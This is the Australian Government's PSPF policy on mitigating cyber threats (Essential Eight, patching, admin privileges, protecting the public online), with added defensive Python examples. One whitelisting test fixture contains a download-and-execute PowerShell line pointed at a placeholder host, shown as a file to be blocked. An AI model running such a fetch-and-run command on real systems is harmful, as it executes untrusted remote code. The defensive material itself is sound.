10 Safeguarding information from cyber threats

Purpose

This policy describes how entities can mitigate common and emerging cyber threats. Cyber threats faced by the Australian Government commonly include:

  1. external adversaries who steal data
  2. ransomware that denies access to data, and external adversaries who destroy data and prevent systems from functioning
  3. malicious insiders who steal data
  4. malicious insiders who destroy data and prevent systems from functioning.

The most common cyber threat facing entities is external adversaries who attempt to steal data. These adversaries commonly seek access to systems and information through email and web content. It is critical that entities safeguard the information held on systems that can receive email or browse internet content.

The Australian Signals Directorate's (ASD) Australian Cyber Security Centre (ACSC) provides expert guidance to help entities mitigate cyber threats. While no single mitigation strategy is guaranteed to prevent a cyber security incident, the ACSC estimates that many cyber threats could be mitigated by whitelisting applications, patching applications, patching operating systems and restricting administrative privileges. These four mandatory strategies form part of the Essential Eight mitigation strategies. The Essential Eight represents the best advice on the measures an entity can implement to mitigate cyber threats. It is considered the baseline for cyber resilience, and entities are strongly recommended to implement all eight Essential Eight mitigation strategies.

Requirements

Core requirement

Each entity must mitigate common and emerging cyber threats by:

  1. implementing the following Australian Signals Directorate (ASD) Strategies to Mitigate Cyber Security Incidents:
    1. application whitelisting
    2. patching applications
    3. restricting administrative privileges, and
    4. patching operating systems;
  2. considering which of the remaining Strategies to Mitigate Cyber Security Incidents the entity needs to implement to protect itself.

Supporting requirements

Supporting requirements help to safeguard information from cyber threats when engaging with members of the public online.

Supporting requirements for safeguarding information from cyber threats

Requirement 1. Transacting online with the public

Entities must not expose the public to unnecessary cyber security risks when they transact online with government.

Guidance

When implementing a mitigation strategy, first implement it for workstations of high-risk users and for internet-connected systems before implementing more broadly.

Achieving PSPF maturity with ASD mitigation strategies

Application whitelisting

Malicious code (malware) often aims to exploit security vulnerabilities in existing applications and does not need to be installed on the workstation to be successful. Application whitelisting is effective in addressing instances of malicious code.

Application whitelisting ensures that only authorised applications (eg programs, software libraries, scripts and installers) can be executed. As such, application whitelisting prevents malicious software and unapproved programs from running. Through application whitelisting, an entity can protect its systems by:

  1. identifying authorised applications
  2. developing rules to ensure only authorised applications can execute
  3. maintaining whitelisting rules using a change-management program.

It is important that users and system administrators cannot temporarily or permanently disable, bypass or be exempt from application whitelisting mechanisms (except when conducting authorised administrative activities). This maintains the integrity of application whitelisting as a security treatment.
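As an added worked example (not code from the PSPF or from any ASD/ACSC tool), the following Python evaluates the three steps above against a constructed rule set: authorised applications are identified by publisher, hash or path; rules are evaluated with deny taking precedence and default deny for anything unmatched; and a check flags any allow rule that would let a user-writable location defeat the control. The rule kinds, the file extensions treated as executable content, the sample paths and the publisher name are assumptions made for the example.

```python
"""Application whitelist rule evaluation (added example; not from the PSPF page
or any ASD/ACSC tool). Rule kinds, file classes and sample paths are assumptions
made for the example."""
import fnmatch
import hashlib
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Executable content the policy says whitelisting must cover: programs,
# libraries, scripts and installers. The extension mapping is an assumption.
CONTROLLED_EXTENSIONS = {".exe", ".dll", ".ps1", ".vbs", ".js", ".hta",
                         ".msi", ".bat", ".cmd"}


@dataclass(frozen=True)
class Rule:
    kind: str               # "hash", "publisher" or "path"
    value: str              # sha256 hex digest, publisher name, or path glob
    action: str = "allow"   # "allow" or "deny"


@dataclass(frozen=True)
class FileInfo:
    path: str
    content: bytes
    publisher: Optional[str] = None   # name from an already-verified code signature (assumed)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def _norm(path: str) -> str:
    """Lower-case and use '/' so C:\\x and c:/x compare equal."""
    return path.lower().replace("\\", "/")


def is_controlled(path: str) -> bool:
    """Data files are not subject to the policy; executable content is."""
    p = path.lower()
    return any(p.endswith(ext) for ext in CONTROLLED_EXTENSIONS)


def rule_matches(rule: Rule, f: FileInfo) -> bool:
    if rule.kind == "hash":
        return sha256_hex(f.content) == rule.value.lower()
    if rule.kind == "publisher":
        return f.publisher is not None and f.publisher == rule.value
    if rule.kind == "path":
        return fnmatch.fnmatchcase(_norm(f.path), _norm(rule.value))
    raise ValueError(f"unknown rule kind {rule.kind!r}")


def evaluate(rules: List[Rule], f: FileInfo) -> Tuple[str, str]:
    """Deny rules take precedence over allow rules, and anything no allow rule
    covers is denied (default deny). Returns (decision, reason)."""
    if not is_controlled(f.path):
        return "allow", "not executable content"
    matched = [r for r in rules if rule_matches(r, f)]
    for r in matched:
        if r.action == "deny":
            return "deny", f"deny {r.kind} rule {r.value}"
    for r in matched:
        if r.action == "allow":
            return "allow", f"allow {r.kind} rule {r.value}"
    return "deny", "no allow rule matched (default deny)"


# Constructed rule set (hypothetical publisher and paths).
RULES = [
    Rule("publisher", "Vendor Pty Ltd"),
    Rule("path", r"C:\Program Files\*"),
    Rule("path", r"C:\Windows\*"),
    Rule("path", r"C:\Windows\Temp\*", action="deny"),   # user-writable, must stay denied
    Rule("hash", sha256_hex(b"Write-Host 'approved tool'")),
]

# Constructed sample files; the byte contents stand in for real binaries.
SAMPLE_FILES = [
    FileInfo(r"C:\Program Files\Vendor\app.exe", b"MZ vendor app", "Vendor Pty Ltd"),
    FileInfo(r"C:\Users\alice\Downloads\invoice.exe", b"MZ unknown"),
    FileInfo(r"C:\Windows\Temp\run.ps1", b"Invoke-Expression (irm http://example.invalid)"),
    FileInfo(r"C:\Users\alice\Downloads\tool.ps1", b"Write-Host 'approved tool'"),
    FileInfo(r"C:\Users\bob\Documents\notes.txt", b"hello"),
]


def run_example(rules=RULES, files=SAMPLE_FILES):
    """Map each sample path to its allow/deny decision."""
    return {f.path: evaluate(rules, f)[0] for f in files}


def risky_writable_locations(rules, writable_prefixes):
    """Locations where a binary dropped by a normal user would still run,
    i.e. path rules that quietly exempt users from whitelisting."""
    flagged = []
    for prefix in writable_prefixes:
        probe = FileInfo(prefix + "probe.exe", b"MZ probe")
        if evaluate(rules, probe)[0] == "allow":
            flagged.append(prefix)
    return flagged


if __name__ == "__main__":
    for path, decision in run_example().items():
        print(f"{decision:5} {path}")
    print("risky:", risky_writable_locations(RULES, ["C:\\Windows\\Temp\\", "C:\\Users\\"]))
```

The risky-location check is the one to run whenever rules change under change management: a path rule that allows a directory users can write to (a temp or profile directory, for example) effectively exempts those users from whitelisting, which is exactly what the paragraph above says must not happen.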

For further guidance on application whitelisting, see ACSC publications.

Patching vulnerabilities in applications and operating systems

A patch is a piece of software designed to fix problems or update an application or operating system. This includes fixing security vulnerabilities and other program deficiencies as well as improving the usability or performance of the software.

Applying patches to operating systems, applications, drivers, ICT equipment and mobile devices is a critical activity for systems security:

  1. Patching applications helps to prevent the delivery and execution of malicious code (malware).
  2. Patching operating systems helps to limit the extent of cyber security incidents. Applying fixes to known security flaws protects systems from compromise through those flaws. If the operating system is compromised, any action taken or information handled on that computer is at risk.

Patches for security vulnerabilities come in many forms. These include:

  1. fixes that can be applied to pre-existing application versions
  2. fixes incorporated into new applications or drivers that require replacing pre-existing versions
  3. fixes that require overwriting of the firmware on ICT equipment.

Patches for high assurance ICT equipment (ICT equipment that has been approved for the protection of information classified SECRET or above) are assessed by the ACSC, and where required the ACSC will issue advice on the timeframe in which the patch is to be deployed or amend the Australian Government Information Security Manual.

For guidance on patching applications and systems, see ACSC:

  1. Assessing security vulnerabilities and applying patches – provides guidance on conducting a risk assessment to assess the severity of security vulnerabilities and examples of risk level outcomes (extreme risk, high risk, moderate risk and low risk vulnerabilities)
  2. Australian Government Information Security Manual.

The Attorney-General's Department recommends that entities:

  1. monitor relevant sources for information about new security vulnerabilities and associated patches for operating systems and applications. Patching drivers and firmware for ICT equipment is also encouraged
  2. implement a centralised and managed approach to patch operating systems and applications (where possible)
  3. confirm that patches have been installed, applied successfully and remain in place.
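The three recommendations above lend themselves to an automated check. The following Python is an added example (not from the PSPF, ASD or any vendor tool) that compares a list of advisories against a centrally collected software inventory and reports hosts that are past their deployment deadline, and hosts where a patch that was once present has since disappeared. The 48-hour deadline for extreme-risk vulnerabilities is the figure given in Annex A; the other deadlines, product names, versions and hosts are constructed for the example.

```python
"""Patch-compliance check (added example; not from the PSPF page or any ASD
tooling). Tracks advisories, compares them with a software inventory, and
confirms patches were applied and remain in place."""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Deployment deadlines by vulnerability risk level. The 48-hour deadline for
# extreme-risk vulnerabilities is the figure in the policy annex; the other
# three are placeholder assumptions for this example, not ISM timeframes.
DEADLINES = {
    "extreme": timedelta(hours=48),
    "high": timedelta(days=14),
    "moderate": timedelta(days=30),
    "low": timedelta(days=90),
}


@dataclass(frozen=True)
class Advisory:
    product: str
    fixed_version: str   # first version that contains the fix
    risk: str            # extreme / high / moderate / low
    published: datetime


@dataclass(frozen=True)
class Observation:
    host: str
    product: str
    version: str
    seen: datetime       # when the inventory agent reported this version


def parse_version(v: str) -> tuple:
    """Dotted numeric versions only (assumption): '120.0.2' -> (120, 0, 2)."""
    return tuple(int(part) for part in v.split("."))


def assess(advisories, observations, now):
    """Return (overdue, regressions), both sorted.

    overdue:     (host, product, risk, days past deadline) for hosts whose
                 latest reported version is below the fixed version after the
                 deadline has passed.
    regressions: (host, product, current version) for hosts that reported a
                 fixed version earlier and now report an older one, i.e. the
                 patch did not remain in place (reimage from an old image,
                 rollback, restore from backup).
    """
    history = {}
    for obs in sorted(observations, key=lambda o: o.seen):
        history.setdefault((obs.host, obs.product), []).append(obs)

    overdue, regressions = [], {}
    for adv in advisories:
        fixed = parse_version(adv.fixed_version)
        deadline = adv.published + DEADLINES[adv.risk]
        for (host, product), obs_list in history.items():
            if product != adv.product:
                continue
            current = obs_list[-1]
            patched = parse_version(current.version) >= fixed
            if not patched and now > deadline:
                overdue.append((host, product, adv.risk, (now - deadline).days))
            ever_patched = any(parse_version(o.version) >= fixed for o in obs_list)
            if ever_patched and not patched:
                regressions[(host, product)] = current.version
    return sorted(overdue), sorted((h, p, v) for (h, p), v in regressions.items())


# Constructed advisories and inventory (hypothetical products and hosts).
ADVISORIES = [
    Advisory("web-browser", "120.0.2", "extreme", datetime(2024, 3, 7, 9, 0)),
    Advisory("pdf-reader", "23.1.0", "high", datetime(2024, 2, 1, 0, 0)),
]
INVENTORY = [
    Observation("ws01", "web-browser", "120.0.2", datetime(2024, 3, 8, 12, 0)),
    Observation("ws02", "web-browser", "119.0.0", datetime(2024, 3, 9, 12, 0)),
    Observation("ws03", "web-browser", "120.0.2", datetime(2024, 3, 8, 12, 0)),
    Observation("ws03", "web-browser", "119.0.0", datetime(2024, 3, 9, 12, 0)),  # reimaged from old image
    Observation("ws01", "pdf-reader", "23.1.0", datetime(2024, 3, 1, 12, 0)),
    Observation("ws02", "pdf-reader", "22.0.5", datetime(2024, 3, 9, 12, 0)),
]
NOW = datetime(2024, 3, 10, 9, 0)   # the moment the check is run (constructed)


def run_example():
    return assess(ADVISORIES, INVENTORY, NOW)


if __name__ == "__main__":
    overdue, regressions = run_example()
    for host, product, risk, days in overdue:
        print(f"OVERDUE    {host} {product} ({risk}) {days} day(s) past deadline")
    for host, product, version in regressions:
        print(f"REGRESSION {host} {product} back at {version}")
```

The regression list is what answers "remain in place": a host that reported the fixed version last week and an older one today has usually been rebuilt from a stale image or restored from backup, and it will not show up in a report that only looks at the latest inventory against the advisory.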

Managing application patches can be significantly more challenging than operating system patching. The Attorney-General's Department recommends that entities use the latest release of key business applications, as newer releases have better security functionality built in. Such applications include:

  1. office productivity suites (eg Microsoft Office)
  2. PDF readers (eg Adobe Reader)
  3. web browsers (eg Microsoft Internet Explorer, Mozilla Firefox or Google Chrome)
  4. common web browser plugins (eg Adobe Flash)
  5. email clients (eg Microsoft Outlook)
  6. software platforms (eg Oracle Java Platform and Microsoft .NET Framework).

Unsupported systems and when patches are not available

Patches may not be available for older versions of operating systems, especially those no longer supported by vendors. Using unsupported systems exposes entities to security vulnerabilities. New versions of operating systems, applications and hardware often introduce improvements in security functionality over previous versions. This can make it more difficult for an adversary to exploit security vulnerabilities they discover.

If there are no patches available from vendors for a security vulnerability, temporary workarounds may provide an effective protection. These workarounds may be published in conjunction with, or soon after, security vulnerability announcements. Temporary workarounds may include disabling the vulnerable functionality within the operating system, application or device or restricting or blocking access to the vulnerable service using firewalls or other access controls. The decision to implement a temporary workaround is risk-based. For guidance on how to manage a security vulnerability when patches are not available, see the system patching guidance in the Australian Government Information Security Manual.

When a patch is not available for a security vulnerability, it is recommended that entities reduce exposure to the vulnerability through alternative means by:

  1. disabling the functionality associated with the vulnerability
  2. asking the vendor for an alternative method of managing the vulnerability
  3. moving to a different product with a responsive vendor
  4. engaging a software developer to resolve the vulnerability.

If a patch is not available for an application or system that may expose government to high risk, contact ACSC for advice.

Restricting administrative privileges

User accounts with administrative privileges are an attractive target for adversaries because they have a high level of access to the entity's systems. Minimising administrative privileges makes it more difficult for an adversary to spread through the environment or hide their presence.

Configuring privileged accounts so that they cannot access email or open attachments, browse the internet, or obtain files via internet services such as instant messaging or social media minimises the opportunities for these accounts to be compromised.

The PSPF policy: Access to information provides guidance on managing access to information systems. These include unique user identification, user authentication and authorisation practices. The Australian Government Information Security Manual provides technical guidance on using multi-factor authentication to assure a privileged account user's identity. Implementing the identified security controls will lower the risk of user accounts being compromised.

For further guidance on administrative privileges, see ACSC:

  1. Restricting administrative privileges
  2. Australian Government Information Security Manual.

The Essential Eight and other strategies to mitigate cyber security incidents

The Attorney-General's Department strongly recommends entities implement the ACSC Essential Eight strategies to mitigate cyber threats. These strategies incorporate the four mitigation strategies mandated by this policy (see Core requirement above) as well as four additional strategies that effectively mitigate common and emerging cyber threats. The additional four are:

  1. configuring Microsoft Office macro settings
  2. user application hardening
  3. multi-factor authentication
  4. daily backups.

Entities are encouraged to implement the remaining Strategies to Mitigate Cyber Security Incidents, where relevant to their operational and risk environment. A list of the ACSC strategies is at Annex A.

Cyber security responsibilities when transacting online with the public

Demand for online government services continues to grow, as does the scale and sophistication of cybercrime and of other activity, by malicious or benign actors, that can put the public at risk.

Table 1 provides examples of potential threats to the public when transacting online with government.

 

Table 1 Potential threat sources when transacting online with Australian Government entities

An attacker masquerades as a legitimate entity website to compromise a public user's internet-connected device, steal their identity, or scam them into providing personal details (such as credit card information).

An entity website is compromised and used to host malicious software which subsequently compromises an internet-connected device used by the public when they access the website.

An entity website is compromised and used to redirect the public to another malicious website that subsequently compromises their internet-connected device.

A compromised entity website could result in public username or password details being stolen, and an attacker masquerading as the user to claim government or other financial benefits.

The compromised account details of public users could lead to the compromise of other websites, as public users may use the same details for multiple government online accounts.

The compromise of an internet-connected device used by the public could result in:

  1. their addition to a botnet to participate in illegal activities
  2. theft of details for fraud or identity theft purposes
  3. blackmail of the user (where attackers encrypt hard drives and demand money for a decryption key)
  4. corruption of the internet-connected device and loss of user information.

The Attorney-General's Department recommends entities evaluate the threat scenarios identified in Table 1 and adopt the applicable security actions for online services outlined in Table 2. These actions help to avoid exposing the public to cyber security risks when they transact online with government.

 

Table 2 Suggested actions to reduce the risk of harm to the public when transacting online with Australian Government entities


Where online transaction accounts are in use, ensure:

  1. users accept account terms and conditions prior to establishing an account as well as when terms and conditions change
  2. there is a warning that explains (simply):
    1. the specific risks associated with use of the online service
    2. who may, or may not, use the service and under what circumstances
    3. the alternative channels available for service or support.
  3. a link to an entity's privacy policy page is provided for further information to public users on the conditions of acceptance
  4. transaction processes that put the user at risk of unnecessary harm are not implemented.

When public users elect to download non-public information from an entity website, ensure:

  1. an appropriate pre-download warning is in place, identifying the potential risk that they are 'about to download information across an unsecured connection'
  2. the warning offers the options 'proceed', 'cancel' or '?'
  3. links to additional information on the associated risks are provided.

Ensure that Australian Government websites:

  1. contain statements including a 'security notice' and a 'disclaimer notice' (use www.australia.gov.au website as a template for these notices, in consultation with the entity's legal area. For example, advising the public to report suspicious or unauthorised activity related to an online transaction to the responsible entity).

Patches for online services (including information-only web pages) and web servers are to be actioned as a priority by the entity's IT support, as delays in patching may create cyber security vulnerabilities for public users.

Ensure that:

  1. online transactions that transfer personal details to government use a secure connection, and only the information needed to deliver the service is collected
  2. entities using social networking services to interact with the public:
    1. carefully evaluate the privacy and security implications of collecting or retaining personal information as part of a service
    2. monitor social networks for malicious hyperlinks embedded in posts that the entity does not moderate before publication.

Where appropriate and reasonable, entities may offer or impose:

  1. higher level security credentials (eg one-time passwords, digital certificates or tokens), or a password policy that helps users select a secure password
  2. restrictions or warnings about browser versions known to have security weaknesses, are out of date and/or unsupported
  3. a display of the previous login details at user login (entities implementing a high value or high risk transaction may consider notifying the user of access on their account with details of the Internet Protocol (IP) address)
  4. a message of what personal information an entity will never require users to disclose over email (eg that they would not require users to provide sensitive personal information such as login credentials). Entities may provide advice or links to cyber security and cyber safety information
  5. an alert to users when they are redirected to an external website.

Indications of a security compromise can be detected by:

  1. analysing patterns of online user interactions for unusual activity
  2. fingerprinting user access to detect anomalous access vectors
  3. performing a code audit of web application used on the entity's website to detect security vulnerabilities.
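The first two detections above, and the display of previous login details suggested earlier in Table 2, can be built over ordinary authentication logs. The following Python is an added example (not from the PSPF or from any entity's system); the log format, fingerprint values, thresholds and IP addresses are constructed for the example. It flags one address failing logins against many accounts (credential stuffing), a success following a run of failures against one account, and a successful login from a device fingerprint not previously seen for that user, and it produces the previous-login details to show the user at login.

```python
"""Detection over web-service authentication logs (added example; not the
page's or any entity's code). Log format, thresholds, fingerprints and
addresses are constructed for the example."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log line shape; fp is a hash of the client's device/browser fingerprint.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) ip=(?P<ip>\S+) fp=(?P<fp>\S+) result=(?P<result>ok|fail)$"
)

# Constructed sample log. 203.0.113.0/24 and 198.51.100.0/24 are documentation
# ranges, not real clients.
SAMPLE_LOG = """\
2024-03-10T09:00:00Z user=alice ip=198.51.100.7 fp=f1 result=ok
2024-03-10T09:01:00Z user=bob ip=198.51.100.8 fp=f2 result=ok
2024-03-10T09:02:00Z user=alice ip=203.0.113.5 fp=f9 result=fail
2024-03-10T09:02:05Z user=bob ip=203.0.113.5 fp=f9 result=fail
2024-03-10T09:02:10Z user=carol ip=203.0.113.5 fp=f9 result=fail
2024-03-10T09:02:15Z user=dave ip=203.0.113.5 fp=f9 result=fail
2024-03-10T09:02:20Z user=erin ip=203.0.113.5 fp=f9 result=fail
2024-03-10T09:05:00Z user=bob ip=203.0.113.9 fp=f3 result=fail
2024-03-10T09:05:10Z user=bob ip=203.0.113.9 fp=f3 result=fail
2024-03-10T09:05:20Z user=bob ip=203.0.113.9 fp=f3 result=fail
2024-03-10T09:05:30Z user=bob ip=203.0.113.9 fp=f3 result=fail
2024-03-10T09:05:40Z user=bob ip=203.0.113.9 fp=f3 result=ok
2024-03-10T10:00:00Z user=alice ip=198.51.100.7 fp=f1 result=ok
"""


def parse(lines):
    """Parse log lines into event dicts; lines that do not match are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(e)
    return events


def detect(events, window=timedelta(minutes=10), stuffing_accounts=5, bruteforce_failures=4):
    """Return (alerts, banners).

    alerts:  ("credential_stuffing", ip, distinct accounts) when one address
             fails against many accounts inside the window;
             ("bruteforce_success", user, failures) when a success follows a
             run of failures for that account inside the window;
             ("new_device", user, fp) when a success comes from a fingerprint
             not seen on any earlier success for that user.
    banners: (user, login time, previous login time, previous ip) for each
             success that had an earlier success, i.e. the 'previous login
             details' to display to the user.
    """
    failures_by_ip = defaultdict(list)    # ip -> [(ts, user)]
    failures_by_user = defaultdict(list)  # user -> [ts]
    seen_fp = defaultdict(set)            # user -> fingerprints of successful logins
    last_success = {}                     # user -> (ts, ip)
    alerted_ips = set()
    alerts, banners = [], []

    for e in sorted(events, key=lambda e: e["ts"]):
        ts, user, ip, fp = e["ts"], e["user"], e["ip"], e["fp"]
        if e["result"] == "fail":
            failures_by_ip[ip].append((ts, user))
            failures_by_user[user].append(ts)
            recent_users = {u for t, u in failures_by_ip[ip] if ts - t <= window}
            if len(recent_users) >= stuffing_accounts and ip not in alerted_ips:
                alerted_ips.add(ip)
                alerts.append(("credential_stuffing", ip, len(recent_users)))
            continue

        recent_failures = [t for t in failures_by_user[user] if ts - t <= window]
        if len(recent_failures) >= bruteforce_failures:
            alerts.append(("bruteforce_success", user, len(recent_failures)))
        if seen_fp[user] and fp not in seen_fp[user]:
            alerts.append(("new_device", user, fp))
        seen_fp[user].add(fp)
        if user in last_success:
            prev_ts, prev_ip = last_success[user]
            banners.append((user, ts.isoformat(), prev_ts.isoformat(), prev_ip))
        last_success[user] = (ts, ip)
    return alerts, banners


def run_example():
    return detect(parse(SAMPLE_LOG.splitlines()))


if __name__ == "__main__":
    alerts, banners = run_example()
    for a in alerts:
        print("ALERT", *a)
    for user, ts, prev_ts, prev_ip in banners:
        print(f"{user} at {ts}: previous login {prev_ts} from {prev_ip}")
```

The thresholds are deliberately parameters: what counts as "many accounts" or "a run of failures" depends on the service's normal traffic, and the entity's incident response plan should say who reviews the alerts. The previous-login banner is the cheap version of the Table 2 suggestion; showing the IP address as well is the high-value-transaction option noted there.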

Find out more

Related policies and guidance include:

  1. the Australian Government Information Security Manual
  2. Strategies to Mitigate Cyber Security Incidents
  3. the Australian Cyber Security Centre (ACSC) publications and advice.

Annex A - ACSC strategies to mitigate cyber incidents 

The Australian Signals Directorate (ASD) has developed prioritised strategies to help mitigate cyber threats, including advice on the suggested implementation order depending on the threats that most concern your entity. For further guidance see ACSC publications: Strategies to Mitigate Cyber Security Incidents and Strategies to Mitigate Cyber Security Incidents Mitigation Details.

Annex A Table 1 Strategies to mitigate cyber incidents – Mitigation strategies to prevent malware delivery and execution

Each entry gives the relative security effectiveness rating, followed by the mitigation strategy.

  1. Essential (mandatory) – Application whitelisting of approved/trusted programs to prevent execution of unapproved/malicious programs including .exe, DLL, scripts (eg Windows Script Host, PowerShell and HTA) and installers.
  2. Essential (mandatory) – Patch applications eg Flash, web browsers, Microsoft Office, Java and PDF viewers. Patch/mitigate computers with extreme risk vulnerabilities within 48 hours. Use the latest version of applications.
  3. Essential (strongly recommended) – Configure Microsoft Office macro settings to block macros from the internet, and only allow vetted macros either in 'trusted locations' with limited write access or digitally signed with a trusted certificate.
  4. Essential (strongly recommended) – User application hardening. Configure web browsers to block Flash (ideally uninstall it), ads and Java on the internet. Disable unneeded features in Microsoft Office (eg OLE), web browsers and PDF viewers.
  5. Excellent – Automated dynamic analysis of email and web content run in a sandbox, blocked if suspicious behaviour is identified (eg network traffic, new or modified files, or other system configuration changes).
  6. Excellent – Email content filtering. Whitelist allowed attachment types (including in archives and nested archives). Analyse and sanitise hyperlinks, PDF and Microsoft Office attachments. Quarantine Microsoft Office macros.
  7. Excellent – Web content filtering. Whitelist allowed types of web content and websites with good reputation ratings. Block access to malicious domains and IP addresses, ads, anonymity networks and free domains.
  8. Excellent – Deny corporate computers direct internet connectivity. Use a gateway firewall to require use of a split DNS server, an email server and an authenticated web proxy server for outbound web connections.
  9. Excellent – Operating system generic exploit mitigation eg Data Execution Prevention (DEP), Address Space Layout Randomisation (ASLR) and Enhanced Mitigation Experience Toolkit (EMET).
  10. Very good – Server application hardening especially internet accessible web applications (sanitise input and use TLS not SSL) and databases, as well as applications that access important (sensitive or high availability) data.
  11. Very good – Operating system hardening (including for network devices) based on a Standard Operating Environment, disabling unneeded functionality (eg RDP, AutoRun, LanMan, SMB/NetBIOS, LLMNR and WPAD).
  12. Very good – Antivirus software using heuristics and reputation ratings to check a file's prevalence and digital signature prior to execution. Use antivirus software from different vendors for gateways versus computers.
  13. Very good – Control removable storage media and connected devices. Block unapproved CD, DVD and USB storage media. Block connectivity with unapproved smartphones, tablets and Bluetooth, Wi-Fi, 3G and 4G devices.
  14. Very good – Block spoofed emails. Use Sender Policy Framework (SPF) or Sender ID to check incoming emails. Use 'hard fail' SPF TXT and DMARC DNS records to mitigate emails that spoof the entity's domain.
  15. Good – User education. Avoid phishing emails (eg with links to login to fake websites), weak passphrases, passphrase reuse, as well as unapproved: removable storage media, connected devices and cloud services.
  16. Limited – Antivirus software with up-to-date signatures to identify malware, from a vendor that rapidly adds signatures for new malware. Use antivirus software from different vendors for gateways versus computers.
  17. Limited – TLS encryption between email servers to help prevent legitimate emails being intercepted and subsequently leveraged for social engineering. Perform content scanning after email traffic is decrypted.
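The 'Block spoofed emails' strategy above asks for a hard-fail SPF record and a DMARC record for the entity's domain. The following Python is an added example (not from the PSPF or ASD) that classifies a domain's SPF and DMARC posture from its TXT records: it checks that exactly one SPF record exists and ends in '-all', counts the mechanisms that cost a DNS lookup (RFC 7208 allows ten), and checks that the DMARC policy is p=reject and that no weaker subdomain policy undoes it. The domain names and records are constructed, not real DNS data; a real check would obtain them with a TXT lookup of the domain and of _dmarc.<domain>.

```python
"""SPF and DMARC posture check (added example; not from the PSPF page or ASD).
The records below are constructed for hypothetical domains; in practice they
come from TXT lookups of <domain> and _dmarc.<domain>."""
import re

# domain -> (TXT records at the domain, TXT records at _dmarc.<domain>)
RECORDS = {
    "agency.example": (
        ["v=spf1 include:_spf.mailprovider.example ip4:203.0.113.0/24 -all"],
        ["v=DMARC1; p=reject; sp=reject; rua=mailto:dmarc@agency.example; adkim=s; aspf=s"],
    ),
    "legacy.example": (
        ["v=spf1 mx a ~all"],
        ["v=DMARC1; p=none; rua=mailto:dmarc@legacy.example"],
    ),
    "parked.example": (["v=spf1 -all"], ["v=DMARC1; p=reject"]),   # non-sending domain
    "open.example": (["v=spf1 +all"], []),
    "nospf.example": (["site-verification=abc123"], []),
}

LOOKUP_MECHANISMS = {"include", "a", "mx", "ptr", "exists", "redirect"}
ALL_RE = re.compile(r"^([+\-~?]?)all$")


def parse_spf(txt_records):
    """Return (record_count, qualifier on 'all', dns_lookups).

    The lookup count covers this record only; included records add their own
    lookups, so the figure is a lower bound on the real total."""
    spf = [r for r in txt_records if r.lower().startswith("v=spf1")]
    if len(spf) != 1:
        return len(spf), None, 0
    all_q, lookups = None, 0
    for term in spf[0].split()[1:]:
        t = term.lower()
        m = ALL_RE.match(t)
        if m:
            all_q = m.group(1) or "+"     # a bare 'all' means '+all'
            continue
        name = re.split(r"[:/=]", t.lstrip("+-~?"), maxsplit=1)[0]
        if name in LOOKUP_MECHANISMS:
            lookups += 1
    return 1, all_q, lookups


def parse_dmarc(txt_records):
    """Return the DMARC tag dict, or None when no record is published."""
    recs = [r for r in txt_records if r.strip().lower().startswith("v=dmarc1")]
    if not recs:
        return None
    tags = {}
    for part in recs[0].split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip().lower()
    return tags


def assess_domain(spf_txt, dmarc_txt):
    findings = []
    count, all_q, lookups = parse_spf(spf_txt)
    if count == 0:
        findings.append("SPF_MISSING")
    elif count > 1:
        findings.append("SPF_MULTIPLE")          # more than one record is a permerror
    elif all_q == "+":
        findings.append("SPF_PLUS_ALL")          # anyone may send as the domain
    elif all_q in ("~", "?"):
        findings.append("SPF_NOT_HARD_FAIL")     # soft fail / neutral, not '-all'
    elif all_q is None:
        findings.append("SPF_NO_ALL")            # implicit neutral result
    if lookups > 10:
        findings.append("SPF_TOO_MANY_LOOKUPS")  # RFC 7208 limit, permerror

    dmarc = parse_dmarc(dmarc_txt)
    p = dmarc.get("p") if dmarc else None
    if dmarc is None:
        findings.append("DMARC_MISSING")
    elif p == "none":
        findings.append("DMARC_NONE")            # monitoring only, nothing is rejected
    elif p == "quarantine":
        findings.append("DMARC_QUARANTINE")
    elif p != "reject":
        findings.append("DMARC_NO_POLICY")
    if p == "reject" and dmarc.get("sp", p) in ("none", "quarantine"):
        findings.append("DMARC_SUBDOMAIN_WEAKER")

    compliant = count == 1 and all_q == "-" and lookups <= 10 and p == "reject" \
        and "DMARC_SUBDOMAIN_WEAKER" not in findings
    return {"findings": findings, "compliant": compliant, "spf_lookups": lookups}


def assess_all(records=RECORDS):
    return {domain: assess_domain(spf, dmarc) for domain, (spf, dmarc) in records.items()}


if __name__ == "__main__":
    for domain, result in assess_all().items():
        status = "OK  " if result["compliant"] else "FAIL"
        print(status, domain, ", ".join(result["findings"]) or "hard fail SPF and DMARC reject")
```

The parked domain is worth noting: a domain that never sends mail should still publish 'v=spf1 -all' and a reject policy, otherwise it is the easiest of the entity's domains to spoof.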

Annex A Table 2 Strategies to Mitigate Cyber Incidents – Mitigation strategies to limit the extent of cyber security incidents

Each entry gives the relative security effectiveness rating, followed by the mitigation strategy.

  1. Essential (mandatory) – Restrict administrative privileges to operating systems and applications based on user duties. Regularly revalidate the need for privileges. Don't use privileged accounts for reading email and web browsing.
  2. Essential (mandatory) – Patch operating systems. Patch/mitigate computers (including network devices) with extreme risk vulnerabilities within 48 hours. Use the latest operating system version. Do not use unsupported versions.
  3. Essential (strongly recommended) – Multi-factor authentication including for VPNs, RDP, SSH and other remote access, and for all users when they perform a privileged action or access an important (sensitive or high availability) data repository.
  4. Excellent – Disable local administrator accounts or assign passphrases that are random and unique for each computer's local administrator account to prevent propagation using shared local administrator credentials.
  5. Excellent – Network segmentation. Deny network traffic between computers unless required. Constrain devices with low assurance (eg BYOD and IoT). Restrict access to network drives and data repositories based on user duties.
  6. Excellent – Protect authentication credentials. Remove cPassword values (MS14-025). Configure WDigest (KB2871997). Use Credential Guard. Change default passphrases. Require long complex passphrases.
  7. Very good – Non-persistent virtualised sandboxed environment. Deny access to important (sensitive or high availability) data, for risky activities (eg web browsing, and viewing untrusted Microsoft Office and PDF files).
  8. Very good – Software-based application firewall, blocking incoming network traffic. Block traffic that is malicious or unauthorised, and deny network traffic by default (eg unneeded or unauthorised RDP and SMB/NetBIOS traffic).
  9. Very good – Software-based application firewall, blocking outgoing network traffic. Block traffic that is not generated by approved or trusted programs, and deny network traffic by default.
